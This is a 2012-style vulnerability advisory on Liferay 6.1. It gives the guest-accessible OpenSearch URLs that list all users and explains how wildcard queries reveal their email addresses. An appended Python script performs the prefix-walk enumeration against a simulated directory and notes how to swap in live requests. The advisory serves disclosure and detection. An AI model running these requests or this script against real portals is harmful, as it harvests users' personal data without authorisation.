Guests can view names and email addresses of all Liferay users in Liferay 6.1


Description:

Liferay Portal is an enterprise portal written in Java. As an unauthenticated (guest) user it is possible to retrieve the names and email addresses of all Liferay users through the portal's OpenSearch endpoint.

To retrieve a list of all users, simply issue the following request:

http://vulnerablehost/c/search/open_search?p=1&c=5000&keywords=entryClassName:com.liferay.portal.model.User

Getting to the email addresses is a bit more involved, because they are not included in the response. It is still possible to get to them by using wildcard searches. The following request returns all users whose email address starts with "b":

http://vulnerablehost/c/search/open_search?p=1&c=5000&keywords=emailAddress:b*

By adding one character at a time to the emailAddress term, and only extending prefixes that still return results, it is possible to eventually recover a user's full email address. The number of requests needed therefore grows with the number of users and the length of their addresses, not with the number of possible strings.

To check whether an installation is affected, issue the first request as a guest: a vulnerable instance returns user entries instead of an empty result.

Proof of concept:

Code demonstrating the vulnerability can be found at https://github.com/jelmerk/liferay-opensearch-exploit

Systems affected:

Liferay 6.1 CE
Liferay 6.1 EE is possibly affected

Vendor status:

Liferay was notified on May 5, 2012 by filing a bug in their public bug tracker under issue number LPS-27146. The issue has since been marked as a duplicate of LPS-25877, an issue that one of the core engineers filed, but not under the security category. That ticket did not mention the possibility of obtaining the email addresses. The issue is possibly already silently resolved in the for-pay Enterprise Edition, but not in the Community Edition.
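The prefix walk described above, as an added example that is not the advisory's proof-of-concept code and not Liferay's own code. The live HTTP requests are replaced by a constructed in-memory search backend (SAMPLE_USERS) so the example runs offline; the character set tried at each position, and the assumption that a query without a trailing wildcard matches an address exactly, are both assumptions of this example rather than facts stated by the advisory.

```python
"""Added example: enumerating user email addresses through the
/c/search/open_search wildcard query, one character at a time.
Not the advisory's PoC; the portal is replaced by a simulated backend."""
from typing import Callable, Dict, List
from urllib.parse import urlencode

# Characters tried at each position. Assumption: sufficient for the
# addresses being enumerated; extend it for other address formats.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789.@-_+"


def build_search_url(host: str, keywords: str, page: int = 1, count: int = 5000) -> str:
    """Build the open_search URL in the form used in the advisory
    (p = page, c = hits per page, keywords = Lucene-style query)."""
    query = urlencode({"p": page, "c": count, "keywords": keywords})
    return f"http://{host}/c/search/open_search?{query}"


# Constructed sample directory standing in for the portal's user index.
SAMPLE_USERS: Dict[str, str] = {
    "bob@example.com": "Bob Builder",
    "bea.smith@example.org": "Bea Smith",
    "carol@example.com": "Carol Danvers",
}


def simulated_open_search(keywords: str) -> List[str]:
    """Stand-in for the portal's response: the names of users matching
    an emailAddress:<term> query. A trailing '*' makes the term a prefix
    match; otherwise the match is exact (assumption of this example).
    A live replacement would fetch build_search_url(host, keywords)
    and return one item per entry in the OpenSearch response."""
    field, _, term = keywords.partition(":")
    if field != "emailAddress":
        return []
    term = term.lower()
    if term.endswith("*"):
        prefix = term[:-1]
        return [name for mail, name in SAMPLE_USERS.items() if mail.startswith(prefix)]
    return [name for mail, name in SAMPLE_USERS.items() if mail == term]


def enumerate_emails(search: Callable[[str], List[str]],
                     alphabet: str = ALPHABET,
                     max_len: int = 64) -> Dict[str, str]:
    """Depth-first walk over address prefixes. A prefix is extended only
    while 'emailAddress:<prefix>*' still returns results, so dead
    branches are pruned after a single request. A prefix is recorded as
    a complete address once the exact query matches it; the walk still
    continues past it, so an address that is a prefix of another address
    is not missed. Returns {email: display name}."""
    found: Dict[str, str] = {}
    stack = list(reversed(alphabet))  # pop() then yields 'a' first
    while stack:
        prefix = stack.pop()
        if not search(f"emailAddress:{prefix}*"):
            continue  # no address starts with this prefix: prune
        exact = search(f"emailAddress:{prefix}")
        if exact:
            found[prefix] = exact[0]
        if len(prefix) < max_len:
            stack.extend(prefix + c for c in reversed(alphabet))
    return found


def count_requests(search: Callable[[str], List[str]]):
    """Wrap a search function to count how many requests the walk costs."""
    calls = {"n": 0}

    def counted(keywords: str) -> List[str]:
        calls["n"] += 1
        return search(keywords)

    return counted, calls


if __name__ == "__main__":
    counted, calls = count_requests(simulated_open_search)
    print(build_search_url("vulnerablehost", "emailAddress:b*"))
    for mail, name in enumerate_emails(counted).items():
        print(f"{name}: {mail}")
    print(f"{calls['n']} requests for {len(SAMPLE_USERS)} users")
```

Against the constructed directory the walk recovers all three addresses in a few thousand simulated requests; against a real portal the per-request cost is one unauthenticated GET, which is also the pattern (many guest requests to /c/search/open_search with incrementally longer emailAddress: terms) that a web log review would surface.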